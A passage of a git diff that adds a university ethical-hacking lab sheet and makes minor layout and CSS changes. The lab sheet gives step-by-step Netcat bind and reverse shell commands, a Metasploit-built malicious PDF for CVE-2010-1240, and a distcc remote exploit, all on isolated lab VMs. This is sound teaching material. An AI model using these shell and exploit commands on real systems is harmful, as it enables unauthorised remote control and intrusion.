code execution. +tags: ["vulnerabilities", "exploits", "payloads", "metasploit", "bind-shell", "reverse-shell", "penetration-testing"] +categories: ["introducing_attacks"] +lab_sheet_url: "https://docs.google.com/document/d/11I8xMUXrT5ArJIsAhwGDtQ4RkH4l9CR4C2wh9_wz8xM/edit?usp=sharing" +type: ["ctf-lab", "lab-sheet"] +lecture_url: "http://z.cliffe.schreuders.org/presentations/slides/DSL_DS_OSPT_Lectures_3_Vulnerabilities.html" +reading: "Chapter 8: Using Metasploit. Harper, A. and Harris, S. and Ness, J. and Eagle, C. and Lenkey, G, and Williams, T. (2011), Gray hat hacking : the ethical hacker's handbook, McGraw-Hill. (ISBN: 978-0-07-174256-6) Available online via the library" +cybok: + - ka: "MAT" + topic: "Attacks and exploitation" + keywords: ["EXPLOITATION", "EXPLOITATION FRAMEWORKS"] + - ka: "SOIM" + topic: "PENETRATION TESTING" + keywords: ["PENETRATION TESTING - SOFTWARE TOOLS", "PENETRATION TESTING - ACTIVE PENETRATION"] +--- + +## General notes about the labs {#general-notes-about-the-labs} + +Often the lab instructions are intentionally open ended, and you will have to figure some things out for yourselves. This module is designed to be challenging, as well as fun\! + +However, we aim to provide a well planned and fluent experience. If you notice any mistakes in the lab instructions or you feel some important information is missing, please let me (Cliffe) know and I will try to address any issues. + +## Preparation {#preparation} + +==action: For all of the labs in this module, start by logging into Hacktivity.== + +[**Click here for a guide to using Hacktivity.**](https://docs.google.com/document/d/17d5nUx2OtnvkgBcCQcNZhZ8TJBO94GMKF4CHBy1VPjg/edit?usp=sharing) This includes some important information about how to use the lab environment and how to troubleshoot during lab exercises. If you haven't already, have a read through. + +==action: Make sure you are signed up to the module, claim a set of VMs for this lab, and start your VMs.== + +Feel free to read ahead while the VMs are starting. + +==VM: Interact with the Kali VM==. (Click ![][image2] after the VMs have started). ==action: Login with username "kali", password "kali".== + +==VM: Interact with the Windows Victim VM==. ==action: Login with password "tiaspbiqe2r"== (**t**his **i**s **a** **s**ecure **p**assword **b**ut **i**s **q**uite **e**asy **2** **r**emember) to the account that is NOT called "vagrant". + +==VM: On the Windows Victim VM (the victim)==, ==action: open a command prompt by clicking "Start" → "Run", and enter "cmd"==. ==action: Check the IP address of the Windows VM, by running ipconfig==. If the IP address does not start with "10.", then restart the VM from within Windows. + +Leave the Linux victim VM running; you'll connect to it later. + +Note that these systems have been configured to be insecure. The Windows system has installed Adobe Reader \< 8.1.2 and Netcat (a version with the \-e flag, not all versions support this). Which was obtained here: +[http://eternallybored.org/misc/netcat/](http://eternallybored.org/misc/netcat/) + +## Introduction to software vulnerabilities {#introduction-to-software-vulnerabilities} + +Often an attacker’s aim is to get malicious code running on a victim system. One way to achieve this is to trick a user into running some malware. But what if only “trusted” software is running that was obtained from legitimate vendors, and only developed by software authors that have the best of intentions? What if an administrator has locked down the targeted system so that only software from big name development companies, such as Microsoft and Adobe, is allowed to run? Unfortunately, the answer is that most software can’t be trusted to always behave. + +It turns out that it is quite hard to write secure code, and innocent and seemingly small programming mistakes can cause serious software vulnerabilities. + +A *software vulnerability* is a weakness in the security of a program. In many cases software vulnerabilities can lead to attackers being able to take control of the vulnerable software. When an attacker can run any code they like as a result, this is known as “*arbitrary code execution*”. In which case, attackers can essentially assume the identity of the vulnerable software, and misbehave[^1]. + +## Causes of software vulnerabilities {#causes-of-software-vulnerabilities} + +There are various causes of software vulnerabilities. The main categories include: + +* Design flaws (mistakes in design) + +* Implementation flaws (mistakes in programming code) + +* Misconfiguration (mistakes in settings and configuration) + +## Exploits and payloads {#exploits-and-payloads} + +An *exploit* is an action — or a piece of software that performs an action — that takes advantage of a vulnerability. The result is that an attacker makes the system perform in ways that are not intentionally authorised. This could include arbitrary code execution, changes to databases, or denial of service (for example, crashing the system). The action that takes place when an exploit is successful is known as the *payload*. + +## Types of payloads: shellcode {#types-of-payloads:-shellcode} + +In the Malware lab you saw that Metasploit has lots of payloads, and these can be listed. ==action: Run:== + +```bash +msfvenom -l payload | less +``` + +> Note: Note, we are piping the output through to less, so that we can easily scroll through the output. + +> Tip: Press “q” to quit the less program + +Often a payload is “*shellcode*”. That is, it gives the attacker shell access to the target system, meaning they can interact with a command prompt, and run commands on the target’s system. + +There are two main ways to achieve this: bind shells, and reverse shells. + +### Bind shell {#bind-shell} + +The simplest kind of remote shell access is via a **bind shell**. A bind shell listens on the network for a connection (typically over TCP, but it doesn’t have to be), and serves up a shell (command prompt) to anything that connects. + +To get an understanding of the concept, you will simulate this using Netcat. Remember, Netcat is a general purpose network tool, and can be used to act as a client, or as you are about to experience, it can also act as a server, listening for connections. + +==VM: On the Windows Victim VM (the victim)==, ==action: open a command prompt by clicking "Start" → "Run", and enter "cmd".== + +==hint: Note the IP address of the Windows system.== (Hint: "ipconfig") + +==action: To see a description of how to invoke Netcat, run:== + +```bash +nc.exe -h +``` + +==action: Start a Netcat listener that will feed all interaction to a command prompt:== + +```bash +nc.exe -l -p 31337 -e cmd.exe -vv +``` + +> Note: If prompted by Windows firewall, allow the connection by selecting all networks and click "Allow access". + +![][image3] + +Based on the output from the previous command, figure out the meaning of each of the arguments to this above command. For example, “-l” tells Netcat to listen as a service, rather than connect as a client to an existing service. + +Note: obviously, in real attacks you won't be setting this up manually on the victim’s system, you use an exploit to get the payload onto their system. We will get to that soon. + +==VM: On the Kali Linux VM (the attacker)==, ==action: open a terminal by clicking the console icon.== + +==action: Connect to the bind shell that is running on port 31337 of your victim's system:== + +```bash +nc *IP-address-noted-earlier* 31337 +``` + +> Note: If prompted on the target system by Windows firewall, allow the connection. Once you close this connection the Netcat running on the victim will also close, if you want to try again, you also need to repeat the previous command. + +The attacker now has shell access to the victim's system. ==action: Type a few commands (for example: "dir", and "net user"), to confirm you have remote control over the system.== + +Before moving on, let’s demonstrate something simple that can be done with this kind of access: + +==VM: On the Kali Linux VM (the attacker)==, you should see the Windows command prompt within your terminal, showing where you are within the victim's system. ==action: Navigate to the Desktop (hint: "cd Desktop") and enter the following to create a file:== + +```bash +echo Good thing this isn't malware! > not_malware.txt +``` + +==VM: On the Windows Victim VM (the victim)==, ==action: check the desktop==. You should see a new file (with a name that is a little suspicious…). ==action: Open this file to see the message we created from Kali==. Although this is a benign file, we could have created something far worse, such as malware that would trigger when the victim opens it. + +The important thing to note is that with a bind shell the target listens to a port, and the attacker then connects through to the shell. This is illustrated below. + +Bind shell: attacker connects to port on victim + +The main limitation with this approach, is that nowadays Firewalls and NAT routing often prevents any *incoming* network connections that are not already established, unless there is a reason to allow incoming connections on certain ports: for example, if the system is a server it needs to be allowed to accept connections to some ports. Score one for the good guys... + +Bind shell: main limitation, NAT/firewalls rules typically prevent this + +When you are finished simulating a bind shell, run: + +exit + +### Reverse shell {#reverse-shell} + +A solution for an attacker is to rethink the way the connection is established; and rather than connect from the attacker to the victim, get the victim to initiate the connection to the attacker. This is known as a *reverse shell*, and is now the most common approach to shell payloads. + +Reverse shell: connection from the victim to the attacker + +Again, you will simulate this using Netcat: + +==VM: On the Kali Linux VM (the attacker)==: + +==hint: Note the attackers IP address for the host only network== (hint: "ifconfig", the IP address will start the same as the Windows VM IP address you noted earlier). + +==action: Start a listener:== + +```bash +nc -l -p 53 -vv +``` + +==VM: On the Windows VM (the victim)==: + +==action: Connect back to the attacker and present them with their shell:== + +```bash +nc.exe *Attacker-IP-address-noted-above* 53 -e cmd.exe -vv +``` + +Once again you have a shell. Note that this time the Windows firewall does not offer to block the connection, since the connection was outgoing. + +So why, of all 65535 possible TCP/IP ports, would an attacker choose port 53? It is possible to set firewall rules to restrict even outgoing connections. However, most Internet connected systems need to be able to use DNS, which resolves domain names, such as “google.com” into IP addresses. It just so happens that DNS uses port 53 (both UDP and TCP). So by choosing 53, it is *extremely* likely that firewall rules will let this through. + +Before finishing, let’s try a few more simple commands to simulate malicious activity on the victim’s system. + +==VM: On the Kali Linux VM (the attacker)==, you should see the Windows command prompt within your terminal. ==action: Enter the following command (all on one line), and watch the victim's screen:== + +```bash +explorer "https://google.com/search?q=how+to+avoid+paying+taxes" +``` + +Uh Oh - it seems that the victim has just opened a browser and searched for a way to avoid paying taxes! That could come back to haunt them! (Note: Even if they don't have internet access, check the search bar to see what would have been returned). Perhaps spend a few minutes seeing what other things can be triggered via simple commands. For instance, can you find ways of doing the following things? + +* ==action: Open an application on the victim's computer== +* ==action: Delete a file from the victim's computer (do not delete any important files!)== +* ==action: Remotely shut the victim's computer down (save any open work beforehand)== + +When you are finished simulating a reverse shell, run: + +exit + +### A note on NAT {#a-note-on-nat} + +Briefly, a similar complication is the fact that often computer systems share the one public IP address of the router they are behind, which then sends that traffic through to the correct local IP address. This is known as Network Address Translation (NAT). Consequently, unless port forwarding is configured on the router, there is no way to connect directly to a system without a public IP address. Again, reverse shells become a necessity, since they can start connections to other systems. Also, in order for the victim to connect back to the attacker, the attacker requires a public IP address (or port forwarding from a public IP address). + +## Exploits and the Metasploit framework (MSF) {#exploits-and-the-metasploit-framework-msf} + +Remember, an attacker is not going to ask someone to start a Netcat server, to give them access to the system\! They use exploits to take advantage of vulnerabilities, and take control by force. + +Metasploit’s primary focus, as the sound of the name suggests, is on exploits, and exploiting vulnerable systems. Since its inception, the Metasploit framework has evolved to include other types of security tasks; however, exploits are at the heart of MSF, and MSF is one of the most complete tools for exploitation. + +The framework itself provides a set of libraries and tools for exploit development and deployment, and includes modules which add support for specific exploits, payloads, encoders, post-exploitation tools, and other extensions. As illustrated in the figure below, sitting above the framework are a number of different interfaces that can be used to interact with the framework and make use of the modules. Each interface has its uses, and like many software tools, you should learn about the available options so that you can use the right tool for each job. + +Metasploit interfaces and modules + +The most popular interfaces for MSF are: + +* msfconsole: interactive text-based console, with access to all MSF features + +* Metasploit Community & Metasploit Pro: Web interface and additional non-free tools + +* Armitage: graphical user interface (gui) + +A number of other security tools also make use of the MSF, and provide an interface to some of its features. + +In order to make use of an MSF exploit, these steps need to occur: + +* Specify the exploit to use + +* Set options for the exploit (such as the IP address of the computer to attack) + +* Choose a payload (this defines what we end up doing on the compromised system) + +* Optionally choose encoding to evade security monitoring such as anti-malware, intrusion detection systems (IDS), and so on + +* Launch the exploit + +The fact that you can combine exploits, payloads, and encoding methods provides a lot of flexibility that is unavailable using most other methods of exploitation. + +## MSFCONSOLE: the interactive console interface {#msfconsole:-the-interactive-console-interface} + +==VM: On the Kali Linux VM (the attacker)==, ==action: open a terminal by clicking the console icon.== + +The msfconsole interface provides an interactive console, which many consider the preferred interface for Metasploit. It provides all the features of the MSF. + +==action: Start the Metasploit console (this will take a moment):== + +```bash +msfconsole +``` + +When starting, Metasploit console reports the number of exploit modules it includes. Depending on the version, and when it was last updated, MSF will include over two thousand different exploits that can be used to compromise vulnerable systems! + +==action: To see a list of the commands that msfconsole supports run:== + +```bash +msf > help +``` + +==action: To view a list of Metasploit's modules:== + +```bash +msf > show all +``` + +And ==action: to narrow that down to just the exploits (this will also take a second):== + +```bash +msf > show exploits +``` + +==action: Run a msfconsole command to list the available payloads.== Hint: similar to the above. + +Note that in addition to Metasploit commands, you can also run local programs, similar to the standard local shell. ==action: From within msfconsole run:== + +```bash +msf > ls /home/kali +``` + +## Exploits in local programs {#exploits-in-local-programs} + +Many old versions of Adobe Reader contain programming errors that make them vulnerable to attack. It is possible to craft a PDF document that exploits a vulnerability to take control of the program. + +The exploit we will use is against the "Adobe PDF Escape EXE Social Engineering" also known as CVE-2010-1240 (try searching for this CVE and see what information there is). The corresponding Metasploit module is "exploit/windows/fileformat/adobe_pdf_embedded_exe". + +When Adobe Reader opens the malicious PDF file, the user is prompted to execute a payload, with a message that tells the user to click Open, which results in the payload being executed. + +==action: Run:== + +```bash +msf > info exploit/windows/fileformat/adobe_pdf_embedded_exe +``` + +The output will include information about this exploit. + +The "use" command is used to instruct msfconsole to set an exploit module for use: + +==action: Run:== + +```bash +msf > use exploit/windows/fileformat/adobe_pdf_embedded_exe +``` + +If you select a module and then change your mind, you can run "back" to return to not using the exploit: + +```bash +msf exploit(adobe_pdf_embedded_exe) > back +``` + +But we do want to use that one, so once again: + +==action: Run:== + +```bash +msf > use exploit/windows/fileformat/adobe_pdf_embedded_exe +``` + +> Tip: Note that you can use TAB autocomplete, so before you finish typing the above, try pressing the TAB key. You can also use the UP and DOWN cursor keys to return to previous commands. + +==action: To see the options that we need to set in order to exploit the vulnerability, run:== + +```bash +msf exploit(adobe_pdf_embedded_exe) > show options +``` + +If you look within the "Module Options" section, you will see four things that can be set, including the name of the malicious file. ==action: Set the filename with the following command:== + +```bash +msf exploit(adobe_pdf_embedded_exe) > set FILENAME *timetable*.pdf +``` + +You can use something other than "timetable", if you choose. + +The next step is to configure the payload to use. ==action: To list compatible payloads:== + +```bash +msf exploit(adobe_pdf_embedded_exe) > show payloads +``` + +So ==action: to use a reverse shell:== + +```bash +msf exploit(adobe_pdf_embedded_exe) > set PAYLOAD windows/shell/reverse_tcp +``` + +Again, ==action: check the options that need to be set:== + +```bash +msf exploit(adobe_pdf_embedded_exe) > show options +``` + +This time there are two options we need to set: LHOST and LPORT. These are the details of the attackers local system. For the reverse shell to work, it needs to know what IP address and port to connect back to. + +==hint: Note the Host-only IP address of your Kali Linux VM== (hint: "ifconfig", note the address starting with 10), and choose a TCP port to use. + +==action: Set the LHOST:== + +```bash +msf exploit(adobe_pdf_embedded_exe) > set LHOST *Your-Kali-IP-Address* +``` + +==action: Set the LPORT:== + +```bash +msf exploit(adobe_pdf_embedded_exe) > set LPORT *Your-Choice-of-Port* +``` + +==action: Run the exploit:== + +```bash +msf exploit(adobe_pdf_embedded_exe) > run +``` + +This has created a malicious PDF document, which when viewed with a vulnerable reader will spawn a reverse shell. Check the output to see where the PDF file has been stored. + +In order to receive the reverse shell, the attacker needs to start listening for connections, before sending the PDF to a victim. + +==action: Set up the handler:== + +```bash +msf > use exploit/multi/handler +``` + +```bash +msf exploit(handler) > set payload windows/meterpreter/reverse_tcp +``` + +```bash +msf exploit(handler) > set LHOST *Your-Kali-IP-Address* +``` + +```bash +msf exploit(handler) > set LPORT *Your-Choice-of-Port* +``` + +```bash +msf exploit(handler) > run +``` + +> Note: *Your-Choice-of-Port* must be the same as when you created a payload above, i.e. crafted pdf *timetable*.pdf + +Leave the above running, it is waiting for our victim to connect. + +==action: Open a new terminal tab (Shift-Ctrl-T).== + +==action: Transfer the pdf file to the Windows VM, by starting a Web server to share your PDF document:== + +==action: Start by creating a directory to place our files:== + +```bash +sudo mkdir /var/www/html/share +``` + +==action: Copy your new PDF to this location== (if the PDF was originally created in another location, replace the first path with that one instead): + +```bash +sudo cp /home/kali/.msf4/local/*timetable*.pdf /var/www/html/share/ +``` + +==action: Start the Apache Web server:== + +```bash +sudo service apache2 start +``` + +==VM: On the Windows VM (the victim)==, ==action: browse to the Web server hosting the PDF.== + +==action: Open a Web browser, and in the location bar, enter the IP address of your Kali Linux system followed by "/share" and the name of your PDF file.== + +For example: "10.x.x.x/share/timetable.pdf". + +==action: Download and open the PDF document using Adobe Reader==[^2]. + +==VM: On the Kali Linux VM (the attacker)==, ==action: switch to the terminal tab that is running the reverse shell listener==. If the attack was successful, you will now have shell access to the victim system! Just by opening a PDF document, the victim has handed over control of their system to an attacker! + +==action: Type a few commands (for example: "dir")== + +Related reading: + +About the vulnerability: + +[https://nvd.nist.gov/vuln/detail/CVE-2010-1240\#vulnCurrentDescriptionTitle](https://nvd.nist.gov/vuln/detail/CVE-2010-1240#vulnCurrentDescriptionTitle) + +Source code for the exploit: + +[https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/fileformat/adobe\_pdf\_embedded\_exe.rb](https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/fileformat/adobe_pdf_embedded_exe.rb) + +Self-study question: What countermeasures can be used to prevent this kind of attack? Discuss with your tutor, if you are not sure. + +## Exploits in remote services {#exploits-in-remote-services} + +In the previous attack, you attacked a local program (Adobe Reader) that had no direct access to the Internet. This type of attack often involves some *social engineering* (that is, tricking a user into doing something we want), to get someone to access our exploit (in this case, to load the malicious PDF document, and click a button). + +However, many vulnerabilities are directly exposed to the Internet, which can be exploited without having to interact with human beings at all\! A system administrator’s worst nightmare... + +==action: Make sure the Linux Victim VM is running.== You should see this on Hacktivity: + +![][image4] + +You will not be able to open this VM directly, and that is expected. + +==hint: Make a note of the server's IP address.== + +You can determine the IP address of the Victim VM by starting with the same 3 octets of the IP address as your Kali and Windows VMs, but ending in ".3". + +This server is vulnerable because it contains Distcc, software that has security weaknesses known as **CVE-2004-2687**. Distcc is a program to distribute compilation of C/C++ code across systems on a network. Distcc has a [documented security issue](https://distcc.github.io/security.html), where anyone who can connect to the port can execute arbitrary commands as the distcc user. Take a look at the information contained within the links - does this seem similar to previous vulnerabilities we've examined? If not, what's different? + +The Metasploit exploit is known as exploit/unix/misc/distcc_exec + +Continuing on the Kali Linux VM , in msfconsole (type "exit" if you are still in the meterpreter shell from earlier): + +==action: Run:== + +```bash +msf > info exploit/unix/misc/distcc_exec +``` + +The output will include information about this exploit. + +The "use" command is used to instruct msfconsole to set an exploit module for use: + +==action: Run:== + +```bash +msf > use exploit/unix/misc/distcc_exec +``` + +==action: To see the options that we need to set in order to exploit the vulnerability, run:== + +```bash +msf exploit(distcc_exec) > show options +``` + +We need to specify the remote host's IP address. + +Configuration options are set using the "set" command. So ==action: to tell msfconsole what our target is:== + +```bash +msf exploit(distcc_exec) > set RHOST *VICTIM-SERVER-IP-Address* +``` + +(One line, where the IP address is the one you noted earlier). + +It is safe to leave the port as is, since this is the port our target is using. + +As you will remember, the next step is to configure the payload to use. ==action: To list compatible payloads:== + +```bash +msf exploit(distcc_exec) > show payloads +``` + +So ==action: to use a reverse shell:== + +```bash +msf exploit(distcc_exec) > set PAYLOAD cmd/unix/reverse +``` + +Again, ==action: check the options that need to be set:== + +```bash +msf exploit(distcc_exec) > show options +``` + +For the reverse shell to work, it needs to know what IP address and port to connect back to. + +==action: Set the LHOST:== + +```bash +msf exploit(distcc_exec) > set LHOST *Your-Kali-Host-Only-IP-Address* +``` + +==action: Set the LPORT:== + +```bash +msf exploit(distcc_exec) > set LPORT *Your-Choice-of-Port* +``` + +Many exploits do not support it, but some can be checked to see if the target is vulnerable, without actually running the payload: + +==action: Run:== + +```bash +msf exploit(distcc_exec) > check +``` + +In this case, the exploit does not support checking if it will work, but it doesn't hurt to try. + +And ==action: to launch the attack:== + +```bash +msf exploit(distcc_exec) > exploit +``` + +Note that using msfconsole, launching the exploit will also start the reverse shell handler, so we don’t have to manually start the listener beforehand. + +Although you are not greeted by the familiar Linux prompt, you can start running commands. ==action: Check that you have access to the system:== + +```bash +whoami +``` + +```bash +uname -a +``` + +You have user level access to the system! + +In this case we have access to what this user can access on this system. Note that on Unix systems "root" is the superuser (admin) account, and gaining root access is often the aim in an attack against Unix, since you then have the authority to do practically anything on the target system. However, there is often plenty of damage a normal user can cause, including accessing any files that the user is authorised to access. + +==action: You can "upgrade" to an interactive shell prompt by running:== + +```bash +python -c 'import pty; pty.spawn("/bin/bash")' +``` + +==action: Run:== + +```bash +ls /home +``` + +**Find the flag** + +==action: There is a flag in the distccd user's home directory. Find and read the flag, and then submit the flag to Hacktivity.== + +When you are done, press: + +```bash +Ctrl-C +``` + +```bash +msf exploit(distcc_exec) > exit +``` + +Related reading, to understand how the exploit works: + +[https://nvd.nist.gov/vuln/detail/CVE-2004-2687](https://nvd.nist.gov/vuln/detail/CVE-2004-2687) + +The Metasploit exploit: [https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/unix/misc/distcc\_exec.rb](https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/unix/misc/distcc_exec.rb) + +Self-study question: What countermeasures can be used to prevent this kind of attack? Discuss with your tutor, if you are not sure. + +## The need to know as much as possible {#the-need-to-know-as-much-as-possible} + +This lab provided you with information about some attacks that can be used against the victim systems. In order for these attacks to be successful against a target, we needed to know about the software that they were running, the vulnerabilities that they had, and the exploits that could be used to compromise them. In many ways discovering this information is the most important challenge that attackers face, and in order to test the security of computer systems we need to start by learning everything we can about them. This is the focus of the next few labs. + +## Conclusion {#conclusion} + +At this point you have: + +* Learned about various kinds of software vulnerabilities, exploits and their impact + +* Learned about payloads, bind shells, and the reason attackers use reverse shells to circumvent firewalls + +* Used Netcat to simulate shell payloads + +* Used the Metasploit console interface (msfconsole) to create a malicious PDF document, and used it to take remote control over a vulnerable system + +* Used Metasploit to remotely exploit a vulnerable system, gaining access + +* Explored some of the ways that shell access can be used within a system + +* Learned the importance of information gathering, since that information is needed to conduct any of these attacks + +Well done\! + +## Footnotes + +[^1]: Arbitrary code execution is not just something that affects desktop operating systems. Resourceful gamers have shown that certain titles, such as Castlevania: Symphony of the Night or The Legend of Zelda: Ocarina of Time have ways of organising your character’s inventory or giving save files specific names so the system reads them as code, essentially hacking the games in real-time and giving players advantages that were never intended by the developers. + +[^2]: Remember we are exploiting a vulnerability of the Adobe Reader application, so use Adobe Reader and not Chrome to open the PDF file. + +[image1]: + +[image2]: + +[image3]: + +[image4]: \ No newline at end of file diff --git a/_layouts/lab.html b/_layouts/lab.html index 57a23e3..a4feca6 100644 --- a/_layouts/lab.html +++ b/_layouts/lab.html @@ -23,7 +23,15 @@ layout: default
{% if page.author %}
- Author: {{ page.author }} + {% if page.author.first %}Authors:{% else %}Author:{% endif %} + {% if page.author.first %} + {% assign author_count = page.author.size %} + {% for author in page.author %} + {% if forloop.last and author_count > 1 %}and {% endif %}{{ author }}{% unless forloop.last %}, {% endunless %} + {% endfor %} + {% else %} + {{ page.author }} + {% endif %}
{% endif %} {% if page.license %} diff --git a/assets/css/hacktivity-theme.scss b/assets/css/hacktivity-theme.scss index 3ef422c..4eb7964 100644 --- a/assets/css/hacktivity-theme.scss +++ b/assets/css/hacktivity-theme.scss @@ -4,8 +4,9 @@ // Hacktivity Theme CSS Variables and Styles // Set default font family +// use color emoji body { - font-family: "Helvetica Neue", Helvetica, Arial, sans-serif; + font-family: "Helvetica Neue", Helvetica, Arial, sans-serif, "Apple Color Emoji", "Segoe UI Emoji", "Noto Color Emoji", "Twemoji Mozilla"; } h1, h2, h3, h4, h5, h6 { diff --git a/assets/css/main.scss b/assets/css/main.scss index 5103ad2..bbdbafe 100644 --- a/assets/css/main.scss +++ b/assets/css/main.scss @@ -7,7 +7,7 @@ } body { - font-family: -apple-system, BlinkMacSystemFont, 'Segoe UI', 'Roboto', 'Oxygen', 'Ubuntu', Cantarell, 'Fira Sans', 'Droid Sans', 'Helvetica Neue', sans-serif; + font-family: -apple-system, BlinkMacSystemFont, 'Segoe UI', 'Roboto', 'Oxygen', 'Ubuntu', Cantarell, 'Fira Sans', 'Droid Sans', 'Helvetica Neue', sans-serif, "Apple Color Emoji", "Segoe UI Emoji", "Noto Color Emoji", "Twemoji Mozilla"; line-height: 1.6; color: #24292e; background-color: #ffffff; diff --git a/index.md b/index.md index 9dc527c..d9b5262 100644 --- a/index.md +++ b/index.md @@ -27,7 +27,15 @@ Welcome to the Hacktivity SecGen lab sheets repository. This site contains hands
{% if lab.author %}
- Author: {{ lab.author }} + {% if lab.author.first %}Authors:{% else %}Author:{% endif %} + {% if lab.author.first %} + {% assign author_count = lab.author.size %} + {% for author in lab.author %} + {% if forloop.last and author_count > 1 %}and {% endif %}{{ author }}{% unless forloop.last %}, {% endunless %} + {% endfor %} + {% else %} + {{ lab.author }} + {% endif %}
{% endif %} {% if lab.license %}